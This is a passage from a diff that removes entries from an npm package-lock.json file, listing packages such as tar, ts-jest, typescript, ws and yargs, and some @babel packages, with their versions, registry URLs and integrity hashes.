"sha512-2p2KJZTSqQ/I3+HX42EpYOa2l3f8Erv8MWKsy2I9uf4wA7yFIkXRffYdsx86y6z4vHtV8u7g+pPlr8/4ouAxsQ==", - "dependencies": { - "asn1": "~0.2.3", - "assert-plus": "^1.0.0", - "bcrypt-pbkdf": "^1.0.0", - "dashdash": "^1.12.0", - "ecc-jsbn": "~0.1.1", - "getpass": "^0.1.1", - "jsbn": "~0.1.0", - "safer-buffer": "^2.0.2", - "tweetnacl": "~0.14.0" - }, - "bin": { - "sshpk-conv": "bin/sshpk-conv", - "sshpk-sign": "bin/sshpk-sign", - "sshpk-verify": "bin/sshpk-verify" - }, - "engines": { - "node": ">=0.10.0" - } - }, - "node_modules/stack-utils": { - "version": "2.0.6", - "resolved": "https://registry.npmjs.org/stack-utils/-/stack-utils-2.0.6.tgz", - "integrity": "sha512-XlkWvfIm6RmsWtNJx+uqtKLS8eqFbxUg0ZzLXqY0caEy9l7hruX8IpiDnjsLavoBgqCCR71TqWO8MaXYheJ3RQ==", - "dev": true, - "dependencies": { - "escape-string-regexp": "^2.0.0" - }, - "engines": { - "node": ">=10" - } - }, - "node_modules/stack-utils/node_modules/escape-string-regexp": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/escape-string-regexp/-/escape-string-regexp-2.0.0.tgz", - "integrity": "sha512-UpzcLCXolUWcNu5HtVMHYdXJjArjsF9C0aNnquZYY4uW/Vu0miy5YoWvbV345HauVvcAUnpRuhMMcqTcGOY2+w==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/stream-buffers": { - "version": "3.0.2", - "resolved": "https://registry.npmjs.org/stream-buffers/-/stream-buffers-3.0.2.tgz", - "integrity": "sha512-DQi1h8VEBA/lURbSwFtEHnSTb9s2/pwLEaFuNhXwy1Dx3Sa0lOuYT2yNUr4/j2fs8oCAMANtrZ5OrPZtyVs3MQ==", - "engines": { - "node": ">= 0.10.0" - } - }, - "node_modules/string-length": { - "version": "4.0.2", - "resolved": "https://registry.npmjs.org/string-length/-/string-length-4.0.2.tgz", - "integrity": "sha512-+l6rNN5fYHNhZZy41RXsYptCjA2Igmq4EG7kZAYFQI1E1VTXarr6ZPXBg6eq7Y6eK4FEhY6AJlyuFIb/v/S0VQ==", - "dev": true, - "dependencies": { - "char-regex": "^1.0.2", - "strip-ansi": "^6.0.0" - }, - "engines": { - "node": ">=10" - } - }, - "node_modules/string-width": { - "version": "4.2.3", - "resolved": "https://registry.npmjs.org/string-width/-/string-width-4.2.3.tgz", - "integrity": "sha512-wKyQRQpjJ0sIp62ErSZdGsjMJWsap5oRNihHhu6G7JVO/9jIB6UyevL+tXuOqrng8j/cxKTWyWUwvSTriiZz/g==", - "dependencies": { - "emoji-regex": "^8.0.0", - "is-fullwidth-code-point": "^3.0.0", - "strip-ansi": "^6.0.1" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/string-width-cjs": { - "name": "string-width", - "version": "4.2.3", - "resolved": "https://registry.npmjs.org/string-width/-/string-width-4.2.3.tgz", - "integrity": "sha512-wKyQRQpjJ0sIp62ErSZdGsjMJWsap5oRNihHhu6G7JVO/9jIB6UyevL+tXuOqrng8j/cxKTWyWUwvSTriiZz/g==", - "dependencies": { - "emoji-regex": "^8.0.0", - "is-fullwidth-code-point": "^3.0.0", - "strip-ansi": "^6.0.1" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/strip-ansi": { - "version": "6.0.1", - "resolved": "https://registry.npmjs.org/strip-ansi/-/strip-ansi-6.0.1.tgz", - "integrity": "sha512-Y38VPSHcqkFrCpFnQ9vuSXmquuv5oXOKpGeT6aGrr3o3Gc9AlVa6JBfUSOCnbxGGZF+/0ooI7KrPuUSztUdU5A==", - "dependencies": { - "ansi-regex": "^5.0.1" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/strip-ansi-cjs": { - "name": "strip-ansi", - "version": "6.0.1", - "resolved": "https://registry.npmjs.org/strip-ansi/-/strip-ansi-6.0.1.tgz", - "integrity": "sha512-Y38VPSHcqkFrCpFnQ9vuSXmquuv5oXOKpGeT6aGrr3o3Gc9AlVa6JBfUSOCnbxGGZF+/0ooI7KrPuUSztUdU5A==", - "dependencies": { - "ansi-regex": "^5.0.1" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/strip-bom": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/strip-bom/-/strip-bom-4.0.0.tgz", - "integrity": "sha512-3xurFv5tEgii33Zi8Jtp55wEIILR9eh34FAW00PZf+JnSsTmV/ioewSgQl97JHvgjoRGwPShsWm+IdrxB35d0w==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/strip-final-newline": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/strip-final-newline/-/strip-final-newline-2.0.0.tgz", - "integrity": "sha512-BrpvfNAE3dcvq7ll3xVumzjKjZQ5tI1sEUIKr3Uoks0XUl45St3FlatVqef9prk4jRDzhW6WZg+3bk93y6pLjA==", - "dev": true, - "engines": { - "node": ">=6" - } - }, - "node_modules/strip-json-comments": { - "version": "3.1.1", - "resolved": "https://registry.npmjs.org/strip-json-comments/-/strip-json-comments-3.1.1.tgz", - "integrity": "sha512-6fPc+R4ihwqP6N/aIv2f1gMH8lOVtWQHoqC4yK6oSDVVocumAsfCqjkXnqiYMhmMwS/mEHLp7Vehlt3ql6lEig==", - "dev": true, - "engines": { - "node": ">=8" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/supports-color": { - "version": "7.2.0", - "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-7.2.0.tgz", - "integrity": "sha512-qpCAvRl9stuOHveKsn7HncJRvv501qIacKzQlO/+Lwxc9+0q2wLyv4Dfvt80/DPn2pqOBsJdDiogXGR9+OvwRw==", - "dev": true, - "dependencies": { - "has-flag": "^4.0.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/supports-preserve-symlinks-flag": { - "version": "1.0.0", - "resolved": "https://registry.npmjs.org/supports-preserve-symlinks-flag/-/supports-preserve-symlinks-flag-1.0.0.tgz", - "integrity": "sha512-ot0WnXS9fgdkgIcePe6RHNk1WA8+muPa6cSjeR3V8K27q9BB1rTE3R1p7Hv0z1ZyAc8s6Vvv8DIyWf681MAt0w==", - "dev": true, - "engines": { - "node": ">= 0.4" - }, - "funding": { - "url": "https://github.com/sponsors/ljharb" - } - }, - "node_modules/table": { - "version": "6.7.1", - "resolved": "https://registry.npmjs.org/table/-/table-6.7.1.tgz", - "integrity": "sha512-ZGum47Yi6KOOFDE8m223td53ath2enHcYLgOCjGr5ngu8bdIARQk6mN/wRMv4yMRcHnCSnHbCEha4sobQx5yWg==", - "dev": true, - "peer": true, - "dependencies": { - "ajv": "^8.0.1", - "lodash.clonedeep": "^4.5.0", - "lodash.truncate": "^4.4.2", - "slice-ansi": "^4.0.0", - "string-width": "^4.2.0", - "strip-ansi": "^6.0.0" - }, - "engines": { - "node": ">=10.0.0" - } - }, - "node_modules/table/node_modules/ajv": { - "version": "8.6.2", - "resolved": "https://registry.npmjs.org/ajv/-/ajv-8.6.2.tgz", - "integrity": "sha512-9807RlWAgT564wT+DjeyU5OFMPjmzxVobvDFmNAhY+5zD6A2ly3jDp6sgnfyDtlIQ+7H97oc/DGCzzfu9rjw9w==", - "dev": true, - "peer": true, - "dependencies": { - "fast-deep-equal": "^3.1.1", - "json-schema-traverse": "^1.0.0", - "require-from-string": "^2.0.2", - "uri-js": "^4.2.2" - }, - "funding": { - "type": "github", - "url": "https://github.com/sponsors/epoberezkin" - } - }, - "node_modules/table/node_modules/json-schema-traverse": { - "version": "1.0.0", - "resolved": "https://registry.npmjs.org/json-schema-traverse/-/json-schema-traverse-1.0.0.tgz", - "integrity": "sha512-NM8/P9n3XjXhIZn1lLhkFaACTOURQXjWhV4BA/RnOv8xvgqtqpAX9IO4mRQxSx1Rlo4tqzeqb0sOlruaOy3dug==", - "dev": true, - "peer": true - }, - "node_modules/tar": { - "version": "7.1.0", - "resolved": "https://registry.npmjs.org/tar/-/tar-7.1.0.tgz", - "integrity": "sha512-ENhg4W6BmjYxl8GTaE7/h99f0aXiSWv4kikRZ9n2/JRxypZniE84ILZqimAhxxX7Zb8Px6pFdheW3EeHfhnXQQ==", - "dependencies": { - "@isaacs/fs-minipass": "^4.0.0", - "chownr": "^3.0.0", - "minipass": "^7.1.0", - "minizlib": "^3.0.1", - "mkdirp": "^3.0.1", - "yallist": "^5.0.0" - }, - "engines": { - "node": ">=18" - } - }, - "node_modules/tar/node_modules/yallist": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/yallist/-/yallist-5.0.0.tgz", - "integrity": "sha512-YgvUTfwqyc7UXVMrB+SImsVYSmTS8X/tSrtdNZMImM+n7+QTriRXyXim0mBrTXNeqzVF0KWGgHPeiyViFFrNDw==", - "engines": { - "node": ">=18" - } - }, - "node_modules/test-exclude": { - "version": "6.0.0", - "resolved": "https://registry.npmjs.org/test-exclude/-/test-exclude-6.0.0.tgz", - "integrity": "sha512-cAGWPIyOHU6zlmg88jwm7VRyXnMN7iV68OGAbYDk/Mh/xC/pzVPlQtY6ngoIH/5/tciuhGfvESU8GrHrcxD56w==", - "dev": true, - "dependencies": { - "@istanbuljs/schema": "^0.1.2", - "glob": "^7.1.4", - "minimatch": "^3.0.4" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/text-table": { - "version": "0.2.0", - "resolved": "https://registry.npmjs.org/text-table/-/text-table-0.2.0.tgz", - "integrity": "sha1-f17oI66AUgfACvLfSoTsP8+lcLQ=", - "dev": true, - "peer": true - }, - "node_modules/throat": { - "version": "6.0.2", - "resolved": "https://registry.npmjs.org/throat/-/throat-6.0.2.tgz", - "integrity": "sha512-WKexMoJj3vEuK0yFEapj8y64V0A6xcuPuK9Gt1d0R+dzCSJc0lHqQytAbSB4cDAK0dWh4T0E2ETkoLE2WZ41OQ==", - "dev": true - }, - "node_modules/tmpl": { - "version": "1.0.5", - "resolved": "https://registry.npmjs.org/tmpl/-/tmpl-1.0.5.tgz", - "integrity": "sha512-3f0uOEAQwIqGuWW2MVzYg8fV/QNnc/IpuJNG837rLuczAaLVHslWHZQj4IGiEl5Hs3kkbhwL9Ab7Hrsmuj+Smw==", - "dev": true - }, - "node_modules/to-fast-properties": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/to-fast-properties/-/to-fast-properties-2.0.0.tgz", - "integrity": "sha1-3F5pjL0HkmW8c+A3doGk5Og/YW4=", - "dev": true, - "engines": { - "node": ">=4" - } - }, - "node_modules/to-regex-range": { - "version": "5.0.1", - "resolved": "https://registry.npmjs.org/to-regex-range/-/to-regex-range-5.0.1.tgz", - "integrity": "sha512-65P7iz6X5yEr1cwcgvQxbbIw7Uk3gOy5dIdtZ4rDveLqhrdJP+Li/Hx6tyK0NEb+2GCyneCMJiGqrADCSNk8sQ==", - "dev": true, - "dependencies": { - "is-number": "^7.0.0" - }, - "engines": { - "node": ">=8.0" - } - }, - "node_modules/tough-cookie": { - "version": "2.5.0", - "resolved": "https://registry.npmjs.org/tough-cookie/-/tough-cookie-2.5.0.tgz", - "integrity": "sha512-nlLsUzgm1kfLXSXfRZMc1KLAugd4hqJHDTvc2hDIwS3mZAfMEuMbc03SujMF+GEcpaX/qboeycw6iO8JwVv2+g==", - "dependencies": { - "psl": "^1.1.28", - "punycode": "^2.1.1" - }, - "engines": { - "node": ">=0.8" - } - }, - "node_modules/ts-jest": { - "version": "29.2.5", - "resolved": "https://registry.npmjs.org/ts-jest/-/ts-jest-29.2.5.tgz", - "integrity": "sha512-KD8zB2aAZrcKIdGk4OwpJggeLcH1FgrICqDSROWqlnJXGCXK4Mn6FcdK2B6670Xr73lHMG1kHw8R87A0ecZ+vA==", - "dev": true, - "dependencies": { - "bs-logger": "^0.2.6", - "ejs": "^3.1.10", - "fast-json-stable-stringify": "^2.1.0", - "jest-util": "^29.0.0", - "json5": "^2.2.3", - "lodash.memoize": "^4.1.2", - "make-error": "^1.3.6", - "semver": "^7.6.3", - "yargs-parser": "^21.1.1" - }, - "bin": { - "ts-jest": "cli.js" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || ^18.0.0 || >=20.0.0" - }, - "peerDependencies": { - "@babel/core": ">=7.0.0-beta.0 <8", - "@jest/transform": "^29.0.0", - "@jest/types": "^29.0.0", - "babel-jest": "^29.0.0", - "jest": "^29.0.0", - "typescript": ">=4.3 <6" - }, - "peerDependenciesMeta": { - "@babel/core": { - "optional": true - }, - "@jest/transform": { - "optional": true - }, - "@jest/types": { - "optional": true - }, - "babel-jest": { - "optional": true - }, - "esbuild": { - "optional": true - } - } - }, - "node_modules/tslib": { - "version": "2.6.2", - "resolved": "https://registry.npmjs.org/tslib/-/tslib-2.6.2.tgz", - "integrity": "sha512-AEYxH93jGFPn/a2iVAwW87VuUIkR1FVUKB77NwMF7nBTDkDrrT/Hpt/IrCJ0QXhW27jTBDcf5ZY7w6RiqTMw2Q==" - }, - "node_modules/tunnel-agent": { - "version": "0.6.0", - "resolved": "https://registry.npmjs.org/tunnel-agent/-/tunnel-agent-0.6.0.tgz", - "integrity": "sha512-McnNiV1l8RYeY8tBgEpuodCC1mLUdbSN+CYBL7kJsJNInOP8UjDDEwdk6Mw60vdLLrr5NHKZhMAOSrR2NZuQ+w==", - "dependencies": { - "safe-buffer": "^5.0.1" - }, - "engines": { - "node": "*" - } - }, - "node_modules/tweetnacl": { - "version": "0.14.5", - "resolved": "https://registry.npmjs.org/tweetnacl/-/tweetnacl-0.14.5.tgz", - "integrity": "sha512-KXXFFdAbFXY4geFIwoyNK+f5Z1b7swfXABfL7HXCmoIWMKU3dmS26672A4EeQtDzLKy7SXmfBu51JolvEKwtGA==" - }, - "node_modules/type-check": { - "version": "0.4.0", - "resolved": "https://registry.npmjs.org/type-check/-/type-check-0.4.0.tgz", - "integrity": "sha512-XleUoc9uwGXqjWwXaUTZAmzMcFZ5858QA2vvx1Ur5xIcixXIP+8LnFDgRplU30us6teqdlskFfu+ae4K79Ooew==", - "dev": true, - "peer": true, - "dependencies": { - "prelude-ls": "^1.2.1" - }, - "engines": { - "node": ">= 0.8.0" - } - }, - "node_modules/type-detect": { - "version": "4.0.8", - "resolved": "https://registry.npmjs.org/type-detect/-/type-detect-4.0.8.tgz", - "integrity": "sha512-0fr/mIH1dlO+x7TlcMy+bIDqKPsw/70tVyeHW787goQjhmqaZe10uwLujubK9q9Lg6Fiho1KUKDYz0Z7k7g5/g==", - "dev": true, - "engines": { - "node": ">=4" - } - }, - "node_modules/type-fest": { - "version": "0.20.2", - "resolved": "https://registry.npmjs.org/type-fest/-/type-fest-0.20.2.tgz", - "integrity": "sha512-Ne+eE4r0/iWnpAxD852z3A+N0Bt5RN//NjJwRd2VFHEmrywxf5vsZlh4R6lixl6B+wz/8d+maTSAkN1FIkI3LQ==", - "dev": true, - "peer": true, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/typescript": { - "version": "5.7.2", - "resolved": "https://registry.npmjs.org/typescript/-/typescript-5.7.2.tgz", - "integrity": "sha512-i5t66RHxDvVN40HfDd1PsEThGNnlMCMT3jMUuoh9/0TaqWevNontacunWyN02LA9/fIbEWlcHZcgTKb9QoaLfg==", - "dev": true, - "bin": { - "tsc": "bin/tsc", - "tsserver": "bin/tsserver" - }, - "engines": { - "node": ">=14.17" - } - }, - "node_modules/undici-types": { - "version": "6.20.0", - "resolved": "https://registry.npmjs.org/undici-types/-/undici-types-6.20.0.tgz", - "integrity": "sha512-Ny6QZ2Nju20vw1SRHe3d9jVu6gJ+4e3+MMpqu7pqE5HT6WsTSlce++GQmK5UXS8mzV8DSYHrQH+Xrf2jVcuKNg==", - "dev": true - }, - "node_modules/update-browserslist-db": { - "version": "1.0.13", - "resolved": "https://registry.npmjs.org/update-browserslist-db/-/update-browserslist-db-1.0.13.tgz", - "integrity": "sha512-xebP81SNcPuNpPP3uzeW1NYXxI3rxyJzF3pD6sH4jE7o/IX+WtSpwnVU+qIsDPyk0d3hmFQ7mjqc6AtV604hbg==", - "dev": true, - "funding": [ - { - "type": "opencollective", - "url": "https://opencollective.com/browserslist" - }, - { - "type": "tidelift", - "url": "https://tidelift.com/funding/github/npm/browserslist" - }, - { - "type": "github", - "url": "https://github.com/sponsors/ai" - } - ], - "dependencies": { - "escalade": "^3.1.1", - "picocolors": "^1.0.0" - }, - "bin": { - "update-browserslist-db": "cli.js" - }, - "peerDependencies": { - "browserslist": ">= 4.21.0" - } - }, - "node_modules/uri-js": { - "version": "4.4.1", - "resolved": "https://registry.npmjs.org/uri-js/-/uri-js-4.4.1.tgz", - "integrity": "sha512-7rKUyy33Q1yc98pQ1DAmLtwX109F7TIfWlW1Ydo8Wl1ii1SeHieeh0HHfPeL2fMXK6z0s8ecKs9frCuLJvndBg==", - "dependencies": { - "punycode": "^2.1.0" - } - }, - "node_modules/uuid": { - "version": "3.4.0", - "resolved": "https://registry.npmjs.org/uuid/-/uuid-3.4.0.tgz", - "integrity": "sha512-HjSDRw6gZE5JMggctHBcjVak08+KEVhSIiDzFnT9S9aegmp85S/bReBVTb4QTFaRNptJ9kuYaNhnbNEOkbKb/A==", - "deprecated": "Please upgrade to version 7 or higher. Older versions may use Math.random() in certain circumstances, which is known to be problematic. See https://v8.dev/blog/math-random for details.", - "bin": { - "uuid": "bin/uuid" - } - }, - "node_modules/v8-compile-cache": { - "version": "2.3.0", - "resolved": "https://registry.npmjs.org/v8-compile-cache/-/v8-compile-cache-2.3.0.tgz", - "integrity": "sha512-l8lCEmLcLYZh4nbunNZvQCJc5pv7+RCwa8q/LdUx8u7lsWvPDKmpodJAJNwkAhJC//dFY48KuIEmjtd4RViDrA==", - "dev": true, - "peer": true - }, - "node_modules/v8-to-istanbul": { - "version": "9.2.0", - "resolved": "https://registry.npmjs.org/v8-to-istanbul/-/v8-to-istanbul-9.2.0.tgz", - "integrity": "sha512-/EH/sDgxU2eGxajKdwLCDmQ4FWq+kpi3uCmBGpw1xJtnAxEjlD8j8PEiGWpCIMIs3ciNAgH0d3TTJiUkYzyZjA==", - "dev": true, - "dependencies": { - "@jridgewell/trace-mapping": "^0.3.12", - "@types/istanbul-lib-coverage": "^2.0.1", - "convert-source-map": "^2.0.0" - }, - "engines": { - "node": ">=10.12.0" - } - }, - "node_modules/verror": { - "version": "1.10.0", - "resolved": "https://registry.npmjs.org/verror/-/verror-1.10.0.tgz", - "integrity": "sha512-ZZKSmDAEFOijERBLkmYfJ+vmk3w+7hOLYDNkRCuRuMJGEmqYNCNLyBBFwWKVMhfwaEF3WOd0Zlw86U/WC/+nYw==", - "engines": [ - "node >=0.6.0" - ], - "dependencies": { - "assert-plus": "^1.0.0", - "core-util-is": "1.0.2", - "extsprintf": "^1.2.0" - } - }, - "node_modules/walker": { - "version": "1.0.8", - "resolved": "https://registry.npmjs.org/walker/-/walker-1.0.8.tgz", - "integrity": "sha512-ts/8E8l5b7kY0vlWLewOkDXMmPdLcVV4GmOQLyxuSswIJsweeFZtAsMF7k1Nszz+TYBQrlYRmzOnr398y1JemQ==", - "dev": true, - "dependencies": { - "makeerror": "1.0.12" - } - }, - "node_modules/which": { - "version": "2.0.2", - "resolved": "https://registry.npmjs.org/which/-/which-2.0.2.tgz", - "integrity": "sha512-BLI3Tl1TW3Pvl70l3yq3Y64i+awpwXqsGBYWkkqMtnbXgrMD+yj7rhW0kuEDxzJaYXGjEW5ogapKNMEKNMjibA==", - "dependencies": { - "isexe": "^2.0.0" - }, - "bin": { - "node-which": "bin/node-which" - }, - "engines": { - "node": ">= 8" - } - }, - "node_modules/word-wrap": { - "version": "1.2.4", - "resolved": "https://registry.npmjs.org/word-wrap/-/word-wrap-1.2.4.tgz", - "integrity": "sha512-2V81OA4ugVo5pRo46hAoD2ivUJx8jXmWXfUkY4KFNw0hEptvN0QfH3K4nHiwzGeKl5rFKedV48QVoqYavy4YpA==", - "dev": true, - "peer": true, - "engines": { - "node": ">=0.10.0" - } - }, - "node_modules/wrap-ansi": { - "version": "7.0.0", - "resolved": "https://registry.npmjs.org/wrap-ansi/-/wrap-ansi-7.0.0.tgz", - "integrity": "sha512-YVGIj2kamLSTxw6NsZjoBxfSwsn0ycdesmc4p+Q21c5zPuZ1pl+NfxVdxPtdHvmNVOQ6XSYG4AUtyt/Fi7D16Q==", - "dev": true, - "dependencies": { - "ansi-styles": "^4.0.0", - "string-width": "^4.1.0", - "strip-ansi": "^6.0.0" - }, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/chalk/wrap-ansi?sponsor=1" - } - }, - "node_modules/wrap-ansi-cjs": { - "name": "wrap-ansi", - "version": "7.0.0", - "resolved": "https://registry.npmjs.org/wrap-ansi/-/wrap-ansi-7.0.0.tgz", - "integrity": "sha512-YVGIj2kamLSTxw6NsZjoBxfSwsn0ycdesmc4p+Q21c5zPuZ1pl+NfxVdxPtdHvmNVOQ6XSYG4AUtyt/Fi7D16Q==", - "dependencies": { - "ansi-styles": "^4.0.0", - "string-width": "^4.1.0", - "strip-ansi": "^6.0.0" - }, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/chalk/wrap-ansi?sponsor=1" - } - }, - "node_modules/wrappy": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/wrappy/-/wrappy-1.0.2.tgz", - "integrity": "sha1-tSQ9jz7BqjXxNkYFvA0QNuMKtp8=", - "dev": true - }, - "node_modules/write-file-atomic": { - "version": "4.0.2", - "resolved": "https://registry.npmjs.org/write-file-atomic/-/write-file-atomic-4.0.2.tgz", - "integrity": "sha512-7KxauUdBmSdWnmpaGFg+ppNjKF8uNLry8LyzjauQDOVONfFLNKrKvQOxZ/VuTIcS/gge/YNahf5RIIQWTSarlg==", - "dev": true, - "dependencies": { - "imurmurhash": "^0.1.4", - "signal-exit": "^3.0.7" - }, - "engines": { - "node": "^12.13.0 || ^14.15.0 || >=16.0.0" - } - }, - "node_modules/ws": { - "version": "8.18.0", - "resolved": "https://registry.npmjs.org/ws/-/ws-8.18.0.tgz", - "integrity": "sha512-8VbfWfHLbbwu3+N6OKsOMpBdT4kXPDDB9cJk2bJ6mh9ucxdlnNvH1e+roYkKmN9Nxw2yjz7VzeO9oOz2zJ04Pw==", - "engines": { - "node": ">=10.0.0" - }, - "peerDependencies": { - "bufferutil": "^4.0.1", - "utf-8-validate": ">=5.0.2" - }, - "peerDependenciesMeta": { - "bufferutil": { - "optional": true - }, - "utf-8-validate": { - "optional": true - } - } - }, - "node_modules/y18n": { - "version": "5.0.8", - "resolved": "https://registry.npmjs.org/y18n/-/y18n-5.0.8.tgz", - "integrity": "sha512-0pfFzegeDWJHJIAmTLRP2DwHjdF5s7jo9tuztdQxAhINCdvS+3nGINqPd00AphqJR/0LhANUS6/+7SCb98YOfA==", - "dev": true, - "engines": { - "node": ">=10" - } - }, - "node_modules/yaml": { - "version": "1.10.2", - "resolved": "https://registry.npmjs.org/yaml/-/yaml-1.10.2.tgz", - "integrity": "sha512-r3vXyErRCYJ7wg28yvBY5VSoAF8ZvlcW9/BwUzEtUsjvX/DKs24dIkuwjtuprwJJHsbyUbLApepYTR1BN4uHrg==", - "dev": true, - "engines": { - "node": ">= 6" - } - }, - "node_modules/yargs": { - "version": "17.7.2", - "resolved": "https://registry.npmjs.org/yargs/-/yargs-17.7.2.tgz", - "integrity": "sha512-7dSzzRQ++CKnNI/krKnYRV7JKKPUXMEh61soaHKg9mrWEhzFWhFnxPxGl+69cD1Ou63C13NUPCnmIcrvqCuM6w==", - "dev": true, - "dependencies": { - "cliui": "^8.0.1", - "escalade": "^3.1.1", - "get-caller-file": "^2.0.5", - "require-directory": "^2.1.1", - "string-width": "^4.2.3", - "y18n": "^5.0.5", - "yargs-parser": "^21.1.1" - }, - "engines": { - "node": ">=12" - } - }, - "node_modules/yargs-parser": { - "version": "21.1.1", - "resolved": "https://registry.npmjs.org/yargs-parser/-/yargs-parser-21.1.1.tgz", - "integrity": "sha512-tVpsJW7DdjecAiFpbIB1e3qxIQsE6NoPc5/eTdrbbIC4h0LVsWhnoa3g+m2HclBIujHzsxZ4VJVA+GUuc2/LBw==", - "dev": true, - "engines": { - "node": ">=12" - } - }, - "node_modules/yocto-queue": { - "version": "0.1.0", - "resolved": "https://registry.npmjs.org/yocto-queue/-/yocto-queue-0.1.0.tgz", - "integrity": "sha512-rVksvsnNCdJ/ohGc6xgPwyN8eheCxsiLM8mxuE/t/mOVqJewPuO1miLpTHQiRgTKCLexL4MeAFVagts7HmNZ2Q==", - "dev": true, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - } - }, - "dependencies": { - "@ampproject/remapping": { - "version": "2.3.0", - "resolved": "https://registry.npmjs.org/@ampproject/remapping/-/remapping-2.3.0.tgz", - "integrity": "sha512-30iZtAPgz+LTIYoeivqYo853f02jBYSd5uGnGpkFV0M3xOt9aN73erkgYAmZU43x4VfqcnLxW9Kpg3R5LC4YYw==", - "dev": true, - "requires": { - "@jridgewell/gen-mapping": "^0.3.5", - "@jridgewell/trace-mapping": "^0.3.24" - } - }, - "@babel/code-frame": { - "version": "7.12.11", - "resolved": "https://registry.npmjs.org/@babel/code-frame/-/code-frame-7.12.11.tgz", - "integrity": "sha512-Zt1yodBx1UcyiePMSkWnU4hPqhwq7hGi2nFL1LeA3EUl+q2LQx16MISgJ0+z7dnmgvP9QtIleuETGOiOH1RcIw==", - "dev": true, - "requires": { - "@babel/highlight": "^7.10.4" - } - }, - "@babel/compat-data": { - "version": "7.24.4", - "resolved": "https://registry.npmjs.org/@babel/compat-data/-/compat-data-7.24.4.tgz", - "integrity": "sha512-vg8Gih2MLK+kOkHJp4gBEIkyaIi00jgWot2D9QOmmfLC8jINSOzmCLta6Bvz/JSBCqnegV0L80jhxkol5GWNfQ==", - "dev": true - }, - "@babel/core": { - "version": "7.24.4", - "resolved": "https://registry.npmjs.org/@babel/core/-/core-7.24.4.tgz", - "integrity": "sha512-MBVlMXP+kkl5394RBLSxxk/iLTeVGuXTV3cIDXavPpMMqnSnt6apKgan/U8O3USWZCWZT/TbgfEpKa4uMgN4Dg==", - "dev": true, - "requires": { - "@ampproject/remapping": "^2.2.0", - "@babel/code-frame": "^7.24.2", - "@babel/generator": "^7.24.4", - "@babel/helper-compilation-targets": "^7.23.6", - "@babel/helper-module-transforms": "^7.23.3", - "@babel/helpers": "^7.24.4", - "@babel/parser": "^7.24.4", - "@babel/template": "^7.24.0", - "@babel/traverse": "^7.24.1", - "@babel/types": "^7.24.0", - "convert-source-map": "^2.0.0", - "debug": "^4.1.0", - "gensync": "^1.0.0-beta.2", - "json5": "^2.2.3", - "semver": "^6.3.1" - }, - "dependencies": { - "@babel/code-frame": { - "version": "7.24.2", - "resolved": "https://registry.npmjs.org/@babel/code-frame/-/code-frame-7.24.2.tgz", - "integrity": "sha512-y5+tLQyV8pg3fsiln67BVLD1P13Eg4lh5RW9mF0zUuvLrv9uIQ4MCL+CRT+FTsBlBjcIan6PGsLcBN0m3ClUyQ==", - "dev": true, - "requires": { - "@babel/highlight": "^7.24.2", - "picocolors": "^1.0.0" - } - }, - "semver": { - "version": "6.3.1", - "resolved": "https://registry.npmjs.org/semver/-/semver-6.3.1.tgz", - "integrity": "sha512-BR7VvDCVHO+q2xBEWskxS6DJE1qRnb7DxzUrogb71CWoSficBxYsiAGd+Kl0mmq/MprG9yArRkyrQxTO6XjMzA==", - "dev": true - } - } - }, - "@babel/generator": { - "version": "7.24.4", - "resolved": "https://registry.npmjs.org/@babel/generator/-/generator-7.24.4.tgz", - "integrity": "sha512-Xd6+v6SnjWVx/nus+y0l1sxMOTOMBkyL4+BIdbALyatQnAe/SRVjANeDPSCYaX+i1iJmuGSKf3Z+E+V/va1Hvw==", - "dev": true, - "requires": { - "@babel/types": "^7.24.0", - "@jridgewell/gen-mapping": "^0.3.5", - "@jridgewell/trace-mapping": "^0.3.25", - "jsesc": "^2.5.1" - } - }, - "@babel/helper-compilation-targets": { - "version": "7.23.6", - "resolved": "https://registry.npmjs.org/@babel/helper-compilation-targets/-/helper-compilation-targets-7.23.6.tgz", - "integrity": "sha512-9JB548GZoQVmzrFgp8o7KxdgkTGm6xs9DW0o/Pim72UDjzr5ObUQ6ZzYPqA+g9OTS2bBQoctLJrky0RDCAWRgQ==", - "dev": true, - "requires": { - "@babel/compat-data": "^7.23.5", - "@babel/helper-validator-option": "^7.23.5", - "browserslist": "^4.22.2", - "lru-cache": "^5.1.1", - "semver": "^6.3.1" - }, - "dependencies": { - "lru-cache": { - "version": "5.1.1", - "resolved": "https://registry.npmjs.org/lru-cache/-/lru-cache-5.1.1.tgz", - "integrity": "sha512-KpNARQA3Iwv+jTA0utUVVbrh+Jlrr1Fv0e56GGzAFOXN7dk/FviaDW8LHmK52DlcH4WP2n6gI8vN1aesBFgo9w==", - "dev": true, - "requires": { - "yallist": "^3.0.2" - } - }, - "semver": { - "version": "6.3.1", - "resolved": "https://registry.npmjs.org/semver/-/semver-6.3.1.tgz", - "integrity": "sha512-BR7VvDCVHO+q2xBEWskxS6DJE1qRnb7DxzUrogb71CWoSficBxYsiAGd+Kl0mmq/MprG9yArRkyrQxTO6XjMzA==", - "dev": true - }, - "yallist": { - "version": "3.1.1", - "resolved": "https://registry.npmjs.org/yallist/-/yallist-3.1.1.tgz", - "integrity": "sha512-a4UGQaWPH59mOXUYnAG2ewncQS4i4F43Tv3JoAM+s2VDAmS9NsK8GpDMLrCHPksFT7h3K6TOoUNn2pb7RoXx4g==", - "dev": true - } - } - }, - "@babel/helper-environment-visitor": { - "version": "7.22.20", - "resolved": 